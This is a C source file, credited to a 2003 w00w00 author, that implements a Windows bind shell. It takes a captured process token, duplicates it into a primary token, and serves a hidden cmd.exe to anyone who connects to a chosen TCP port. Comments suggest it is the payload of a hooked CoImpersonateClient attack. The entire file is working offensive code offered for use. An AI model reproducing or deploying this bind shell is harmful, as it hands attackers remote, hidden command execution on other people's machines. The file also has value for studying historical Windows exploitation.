/*
 * Code to create a bindshell on a TCP port using the provided token
 * January 2003
 *
 * Matt Conover (shok@dataforce.net)
 * http://www.w00w00.org
 */
#include "bindshell.h"

extern FILE *debug_file;

// This will bind cmd.exe to the TCP port specified using the process token
// specified. It can be either an impersonation or primary token.
BOOL CreateBindshellWithToken(USHORT Port, HANDLE ProcessToken)
{
	register int numbytes;
	int socklen, val = 1;
	char *membuf;

	SECURITY_ATTRIBUTES SecurityAttribs;
	STARTUPINFO StartupInfo;
	PROCESS_INFORMATION ProcessInfo;
	HANDLE StdOutputRead, StdOutputWrite, StdInputRead, StdInputWrite;

	WSADATA wsaData;
	SOCKET serverfd = INVALID_SOCKET, clientfd = INVALID_SOCKET;
	SOCKADDR_IN serversin, clientsin;

	HANDLE PrimaryToken;
	TOKEN_TYPE Type;
	DWORD Size = 0;
	if (!GetTokenInformation(ProcessToken, TokenType, &Type, sizeof(TOKEN_TYPE), &Size))
	{
		if (debug_file) fprintf(debug_file, "GetTokenInformation failed: error code 0x%lx\n", GetLastError());
		return FALSE;
	}

	if (Type != TokenImpersonation) PrimaryToken = ProcessToken; // it is already a primary token
	else
	{
		// It is an impersonation token, so convert it to a primary token
		if (!DuplicateTokenEx(ProcessToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &PrimaryToken))
		{
			if (debug_file)	fprintf(debug_file, "DuplicateTokenEx failed: error code 0x%lx\n", GetLastError());
			return FALSE; // return as if CoImpersonateClient() wasn't hooked
		}
	}
	
	// Socket initialization
	WSAStartup(MAKEWORD(1, 1), &wsaData);

	// Allocate the memory buffer it will use
	membuf = (char *)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, NETBUFSIZE);
	memset(membuf, 0, NETBUFSIZE);

	serverfd = socket(AF_INET, SOCK_STREAM, 0);
	memset(&serversin, 0, sizeof(serversin));
	serversin.sin_family = AF_INET;
	serversin.sin_port = htons(Port);

	if (setsockopt(serverfd, SOL_SOCKET, SO_REUSEADDR, (const char *)&val, sizeof(val)) == SOCKET_ERROR)
	{
		if (debug_file)	fprintf(debug_file, "setsockopt failed: error code 0x%lx\n", WSAGetLastError());
		return FALSE; // return as if CoImpersonateClient() wasn't hooked
	}

	if (bind(serverfd, (LPSOCKADDR)&serversin, sizeof(serversin)) == SOCKET_ERROR)
	{
		if (debug_file) fprintf(debug_file, "bind failed: error code 0x%lx\n", WSAGetLastError());
		return FALSE; // return as if CoImpersonateClient() wasn't hooked
	}

	listen(serverfd, 0);

	// Set handles to inheritable
	SecurityAttribs.nLength = sizeof(SecurityAttribs);
	SecurityAttribs.bInheritHandle = true;
	SecurityAttribs.lpSecurityDescriptor = NULL;

start_server:
	if (debug_file) fprintf(debug_file, "Starting bindshell\n");

	// Setup input and output pipes for shell
	if (!CreatePipe(&StdOutputRead, &StdOutputWrite, &SecurityAttribs, 0))
	{
		if (debug_file) fprintf(debug_file, "CreatePipe 1 failed: error code 0x%lx\n", GetLastError());
		return FALSE; // return as if CoImpersonateClient() wasn't hooked
	}
	if (!CreatePipe(&StdInputRead, &StdInputWrite, &SecurityAttribs, 0))
	{
		if (debug_file) fprintf(debug_file, "CreatePipe 1 failed: error code 0x%lx\n", GetLastError());
		return FALSE; // return as if CoImpersonateClient() wasn't hooked
	}

	// Create a child process that will inherit the input and output
	// handles of the pipes and have a hidden window
	GetStartupInfo(&StartupInfo);
	StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	StartupInfo.wShowWindow = SW_HIDE;
	StartupInfo.hStdOutput = StartupInfo.hStdError = StdOutputWrite;
	StartupInfo.hStdInput = StdInputRead;

#if 0
	fprintf(debug_file, "\nPROCESS TOKEN =\n");
	HANDLE CurrentProcessToken;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &CurrentProcessToken)) return FALSE;
	if (!DumpToken(CurrentProcessToken)) return FALSE;
	fprintf(debug_file, "\nTHREAD TOKEN =\n");
	if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &CurrentThreadToken)) return FALSE;
	if (!DumpToken(CurrentThreadToken)) return FALSE;
	fprintf(debug_file, "\nProcessToken =\n");
	if (!DumpToken(ProcessToken)) return FALSE;
	fprintf(debug_file, "\nPrimaryToken =\n");
	if (!DumpToken(PrimaryToken)) return FALSE;
	fprintf(debug_file, "\n");
#endif

	//if (!CreateProcessAsUser(PrimaryToken, NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &StartupInfo, &ProcessInfo))
	if (!CreateProcess(NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &StartupInfo, &ProcessInfo))	
	{
		if (debug_file) fprintf(debug_file, "CreateProcessAsUser failed: error code 0x%lx\n", GetLastError());

		// close to prevent the process from hanging
		CloseHandle(StdOutputWrite), CloseHandle(StdInputRead);
		CloseHandle(ProcessInfo.hThread), CloseHandle(ProcessInfo.hProcess);
		CloseHandle(PrimaryToken), CloseHandle(ProcessToken);
		return FALSE; // return as if CoImpersonateClient() wasn't hooked
	}

	CloseHandle(StdOutputWrite), CloseHandle(StdInputRead);
	CloseHandle(ProcessInfo.hThread), CloseHandle(ProcessInfo.hProcess);
	CloseHandle(PrimaryToken), CloseHandle(ProcessToken);
	
accept_new_client:
	if (debug_file) fprintf(debug_file, "Waiting for connection...\n");

	// Wait for an incoming connection
	socklen = sizeof(clientsin);
	clientfd = accept(serverfd, (LPSOCKADDR)&clientsin, &socklen);
	if (clientfd == INVALID_SOCKET)
	{
		if (debug_file)	fprintf(debug_file, "accept failed: error code 0x%lx\n", WSAGetLastError());
		return FALSE;
	}

	if (debug_file) fprintf(debug_file, "Connection received\n");

get_cmd_data: // read if there is data from cmd.exe
	Sleep(500);
	if (!PeekNamedPipe(StdOutputRead, NULL, 0, NULL, (DWORD *)&numbytes, 0)) goto accept_new_client;
	if (numbytes == 0) goto get_client_data;
	if (!ReadFile(StdOutputRead, membuf, NETBUFSIZE, (DWORD *)&numbytes, NULL)) goto accept_new_client;

	if (send(clientfd, membuf, numbytes, 0) <= 0)
	{
#ifdef USE_MINIMAL_SIZE
		goto start_server;
#else
		goto close_server;
#endif
	}
   
	goto get_client_data;

get_client_data: // read new user data and send it to cmd.exe
	numbytes = recv(clientfd, membuf, NETBUFSIZE, 0);

	if (numbytes <= 0)
	{
#ifdef USE_MINIMAL_SIZE
		goto start_server;
#else
		goto close_server;
#endif
	}

	if (!WriteFile(StdInputWrite, membuf, numbytes, (DWORD *)&numbytes, NULL))
	{
#ifdef USE_MINIMAL_SIZE
		goto start_server;
#else
		goto close_server;
#endif
	}

	goto get_cmd_data;
   
#ifndef USE_MINIMAL_SIZE
close_server:
	closesocket(clientfd);
	CloseHandle(StdInputWrite);
	CloseHandle(StdOutputRead);
	goto start_server;
#endif

}